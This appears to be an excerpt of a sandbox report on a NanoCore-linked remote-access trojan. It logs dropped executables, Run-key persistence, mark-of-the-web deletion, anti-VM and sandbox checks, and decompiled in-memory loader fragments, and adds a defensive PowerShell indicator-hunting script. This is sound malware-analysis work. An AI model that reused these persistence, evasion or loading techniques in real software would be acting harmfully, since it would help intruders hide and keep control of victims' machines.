Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\new policy.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: new policy.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: new policy.scr.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: new policy.scr.exe Static file information: File size 2360320 > 1048576
Source: new policy.scr.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x22f000
Source: new policy.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\ARM\Desktop\ncsource\Plugins\CorePlugin\CoreClientPlugin\obj\Release\CoreClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: new policy.scr.exe, ParamCreatorObject.cs .Net Code: MapSingleton System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs .Net Code: Memory
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: Yara match File source: 6.2.Networks!.exe.4a592f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Networks!.exe.46792f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.5af0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.4d192f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.4af4e70.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.new policy.scr.exe.49e0650.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2303284343.000000000297D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1884977634.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2324492421.0000000004679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2232333043.0000000004A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059EB76B pushfd ; retf 0_2_059EB76E
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05BFD170 push 8B6C5ADFh; iretd 0_2_05BFD175
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05BFD320 pushad ; retf 0_2_05BFD321
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05C0328E push edi; iretd 0_2_05C03291
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D570FA push eax; retf 0_2_05D570FB
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05E67F92 push 00000031h; retf 0_2_05E67F94
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0588D88F push DA0588D1h; ret 3_2_0588D8C9
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0588D8CB push ss; ret 3_2_0588D8D1
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_07757F28 push esp; ret 3_2_07757F29
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B546C4 push edx; iretd 6_2_02B546D2
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A2B76B pushfd ; retf 6_2_05A2B76E
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05C3D170 push 8B6C56DFh; iretd 6_2_05C3D175
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05C3D320 pushad ; retf 6_2_05C3D321
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05C4328E push edi; iretd 6_2_05C43291
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D970FA push eax; retf 6_2_05D970FB
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00F146BF push edx; iretd 7_2_00F146D2
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_05590D72 push eax; iretd 7_2_05590D1D
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055DB76B pushfd ; retf 7_2_055DB76E
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_057ED170 push 8B6C9BDFh; iretd 7_2_057ED175
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_057ED320 pushad ; retf 7_2_057ED321
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_057F328E push edi; iretd 7_2_057F3291
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_059470FA push eax; retf 7_2_059470FB
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 9_2_05A073CD push FFFFFF8Bh; iretd 9_2_05A073CF
Source: C:\Users\user\Desktop\new policy.scr.exe File created: C:\Users\user\AppData\Roaming\Networks!.exe Jump to dropped file
Source: C:\Users\user\Desktop\new policy.scr.exe File created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\new policy.scr.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Networks! (3 identical entries) Jump to behavior
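A host check for the artifacts this report attributes to the sample, added here as an example and not part of the Joe Sandbox report: the HKCU Run value "Networks!", the two dropped executables, the Global mutex from the Mutant created entry above, and the Zone.Identifier stream whose removal is recorded under the next heading. The value name, file names and mutex GUID are copied from the report; it is an assumption that another build of this sample keeps them, and that the dropped files land in the current user's %APPDATA% and %TEMP% (the report shows the sandbox user's equivalents).

```powershell
# Added example (not from the report): hunt one Windows host for the indicators above.
# Indicator values are taken from the report; everything else is this example's own choice.

$RunValueName = 'Networks!'
$DroppedFiles = @(
    (Join-Path $env:APPDATA 'Networks!.exe'),                       # C:\Users\<u>\AppData\Roaming\Networks!.exe
    (Join-Path $env:TEMP 'airlineagancy.casacam.net 7076.exe')      # C:\Users\<u>\AppData\Local\Temp\...
)
$MutexName = 'Global\{7065c9a5-e7ef-4b4a-9ad2-3b36dc826073}'

$findings = New-Object System.Collections.Generic.List[object]

# 1. Per-user Run value (no admin rights needed, survives logoff/logon)
$runKey   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$runProps = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($runProps -and ($runProps.PSObject.Properties.Name -contains $RunValueName)) {
    $findings.Add([pscustomobject]@{ Type = 'RunKey'; Detail = "$runKey\$RunValueName = $($runProps.$RunValueName)" })
}

# 2. Dropped executables; LiteralPath because '!' and spaces are in the names.
#    Also record whether a Zone.Identifier (mark-of-the-web) stream is still attached;
#    the report shows the sample deleting its own.
foreach ($path in $DroppedFiles) {
    if (Test-Path -LiteralPath $path) {
        $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $motw = Get-Item -LiteralPath $path -Stream Zone.Identifier -ErrorAction SilentlyContinue
        $findings.Add([pscustomobject]@{ Type = 'DroppedFile'; Detail = "$path sha256=$hash motw=$([bool]$motw)" })
    }
}

# 3. Mutex: OpenExisting only succeeds while a process holding it is alive,
#    so this is a "currently running" indicator, not a forensic one.
try {
    $m = [System.Threading.Mutex]::OpenExisting($MutexName)
    $m.Dispose()
    $findings.Add([pscustomobject]@{ Type = 'Mutex'; Detail = $MutexName })
} catch [System.Threading.WaitHandleCannotBeOpenedException] {
    # not present: nothing to record
} catch [System.UnauthorizedAccessException] {
    # exists but owned by another security context (e.g. a different user session)
    $findings.Add([pscustomobject]@{ Type = 'Mutex'; Detail = "$MutexName (exists, access denied)" })
}

# 4. Live processes started from the dropped paths (string compare is case-insensitive)
Get-CimInstance Win32_Process |
    Where-Object { $_.ExecutablePath -and ($DroppedFiles -contains $_.ExecutablePath) } |
    ForEach-Object { $findings.Add([pscustomobject]@{ Type = 'Process'; Detail = "PID $($_.ProcessId) $($_.ExecutablePath)" }) }

if ($findings.Count -eq 0) { 'No indicators from analysis 1502158 found on this host.' }
else { $findings | Format-Table -AutoSize }
```

Treat a hit on the Run value or a dropped file as sufficient on its own; the mutex and process checks only confirm the implant is currently active. A dropped file with motw=False is consistent with the Zone.Identifier deletion the report records, but absence of the stream is also normal for files written by a local process, so it is corroboration rather than evidence by itself.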

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\new policy.scr.exe File opened: C:\Users\user\Desktop\new policy.scr.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Process information set: NOOPENFILEERRORBOX (33 identical entries) Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: 1330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: 2F80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: 1330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: 5E80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: 5C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Memory allocated: 2470000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Memory allocated: 1A510000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: 1500000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: 3200000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Memory allocated: 5200000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 1040000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 2CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 2B50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 5EC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 5C50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: DF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 28E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: F10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 5A70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 5800000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: BC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 26F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 2610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 13F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 2E30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe Memory allocated: 4E30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Networks!.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Window / User API: threadDelayed 4580 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Window / User API: threadDelayed 5192 Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Window / User API: threadDelayed 5225 Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Window / User API: threadDelayed 4600 Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Window / User API: foregroundWindowGot 696 Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe Window / User API: foregroundWindowGot 923 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8076 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8076 Thread sleep time: -35048813740048126s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8080 Thread sleep count: 4580 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8080 Thread sleep count: 5192 > 30 Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe TID: 7856 Thread sleep time: -22136092888451448s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe TID: 3120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Networks!.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\new policy.scr.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Networks!.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Networks!.exe Thread delayed: delay time: 922337203685477
Source: Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: new policy.scr.exe, 00000000.00000002.1884717220.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: new policy.scr.exe, 00000003.00000002.2862345788.00000000066BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4091977760.00000000007B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\new policy.scr.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0145D01C LdrInitializeThunk, 3_2_0145D01C
Source: C:\Users\user\Desktop\new policy.scr.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\new policy.scr.exe Process token adjusted: Debug
